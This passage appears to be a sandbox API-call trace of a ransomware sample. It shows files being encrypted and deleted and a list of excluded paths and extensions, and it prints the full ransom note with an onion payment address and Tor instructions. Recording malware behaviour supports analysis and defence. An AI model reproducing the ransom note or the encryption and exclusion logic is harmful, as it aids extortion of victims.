pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.100] GetLastError () returned 0x0 [0159.100] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.100] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.100] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.100] GetLastError () returned 0x0 [0159.100] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.100] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.100] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.100] GetLastError () returned 0x0 [0159.100] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.100] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.100] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.100] GetLastError () returned 0x0 [0159.100] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.101] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.101] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.101] GetLastError () returned 0x0 [0159.101] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.101] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.101] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.101] GetLastError () returned 0x0 [0159.101] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.101] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.101] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.101] GetLastError () returned 0x0 [0159.101] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.101] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.101] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.101] GetLastError () returned 0x0 [0159.101] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.101] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.101] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.101] GetLastError () returned 0x0 [0159.101] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.101] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.101] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.101] GetLastError () returned 0x0 [0159.101] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.101] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.101] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.102] GetLastError () returned 0x0 [0159.102] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.102] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.102] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.102] GetLastError () returned 0x0 [0159.102] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.102] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.102] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.102] GetLastError () returned 0x0 [0159.102] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.102] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.102] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0159.102] GetLastError () returned 0x0 [0159.102] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0159.102] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0159.102] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0159.102] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui")) returned 0x20 [0159.102] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0159.103] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui") returned 1 [0159.103] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui")) returned 0 [0159.103] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui" [0159.103] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL") returned 1 [0159.103] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\.xXE0C2.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\.xxe0c2.tmp")) returned 0xe0c2 [0159.104] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\.xXE0C2.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\.xxe0c2.tmp"), dwFlags=0x1) returned 0 [0159.104] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\.xXE0C2.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\.xxe0c2.tmp")) returned 1 [0159.104] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0159.104] wcslen (_String="OK") returned 0x2 [0159.105] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.105] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.105] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0159.105] CryptDestroyHash (hHash=0x9ad478) returned 1 [0159.105] CryptReleaseContext (hProv=0x8e3000, dwFlags=0x0) returned 1 [0159.105] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0159.105] GetLastError () returned 0x12 [0159.105] FindClose (in: hFindFile=0x9ad7f8 | out: hFindFile=0x9ad7f8) returned 1 [0159.105] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0159.105] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.106] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.106] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0159.106] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.106] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.106] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0159.106] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.106] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*.exe") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*.dll") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*.lnk") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*.bat") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*.ini") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*.msi") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*.scf") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*pagefile.sys*") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*NTUSER.DAT*") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*AppData*") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*\\winrar\\*") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*\\java\\*") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*\\windows\\*") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*\\ESET\\*") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*\\AVG\\*") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*\\AVIRA\\*") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*Atheros*") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*Realtek*") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*bootmgr*") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*boot*") returned 0 [0159.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*boot*") returned 0 [0159.107] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*CONFIG.SYS*") returned 0 [0159.107] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*IO.SYS*") returned 0 [0159.107] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*MSDOS.SYS*") returned 0 [0159.107] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*NTDETECT.COM*") returned 0 [0159.107] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*ntldr*") returned 0 [0159.107] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*chrome*") returned 0 [0159.107] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*opera*") returned 0 [0159.107] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", pszSpec="*firefox*") returned 0 [0159.107] wcslen (_String="\\\\?\\") returned 0x4 [0159.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad778 [0159.107] wcscmp (_String1=".", _String2=".") returned 0 [0159.107] FindNextFileW (in: hFindFile=0x9ad778, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.107] wcscmp (_String1="..", _String2=".") returned 1 [0159.107] wcscmp (_String1="..", _String2="..") returned 0 [0159.107] FindNextFileW (in: hFindFile=0x9ad778, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0159.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.108] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.108] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0159.108] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0159.108] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0159.108] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0159.108] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0159.108] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0159.108] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0159.108] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0159.108] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui", pszSpec="*") returned 1 [0159.108] strlen (_Str="NMoreira") returned 0x8 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.108] CryptGenRandom (in: hProv=0x8bf310, 